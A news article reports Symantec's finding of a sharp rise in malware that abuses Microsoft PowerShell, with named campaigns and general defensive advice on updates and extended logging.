Microsoft PowerShell, the company's replacement for the Windows command line, has become a target for malware writers, with security software company Symantec claiming to have seen a 95.4 per cent rise in PowerShell malware instances.
PowerShell will become the default alternative to the command line function in Windows when the Creators Edition arrives next year, and has already superseded it in Insider builds.
PowerShell is available already and has been for around for about ten years. It is generally activated by default.
The fact that during a sandbox test of 111 threat families, nearly all the analysed scripts were malicious shows what a threat to the enterprise that the move could potentially be.
Symantec advises sysadmins to make sure that machines are running the latest version of PowerShell and to enable extended logging and monitoring options. They also (not surprisingly) suggest you buy their software to protect yourself.
Among the high-profile cases that have involved PowerShell are the Odinaff Group attacks on financial establishments and the Trojan.Kotver infection, which was created to infect the registry without using any files.
PowerShell can also be used to uninstall security products, detect sandboxes and sniff passwords.
Symantec says: "PowerShell is installed by default on most Windows computers, and most organisations do not have extended logging enabled for the framework. These two factors make PowerShell a favoured attack tool."
It adds: "Furthermore, scripts can easily be obfuscated and allow for payloads to be executed directly from memory."
OpenSSH has been added to bolster security, but because PowerShell is so much more powerful than the old command line, there are a lot more opportunities for mischief. It does, however, form the basis for the interoperability between Linux and Windows that has been increasingly visible over the past year or so.
Back in August, a version of Windows 10 that was automatically rolled out to machines actually borked Powershell altogether, leaving it inaccessible for a week.
And, in the same month, Microsoft warned about a new wave of Word macros viruses - utilising security flaws in PowerShell...
Q3 losses reverse Q2 gains
FBI briefing US companies to dump Kaspersky, claiming intelligence prove it a 'threat to national security'
Kaspersky rejects FBI accusations that its products are a 'threat to national security'
But breached contractor says that it simply didn't have that much data
EE follows Three in threatening legal action against Ofcom - but for entirely different reasons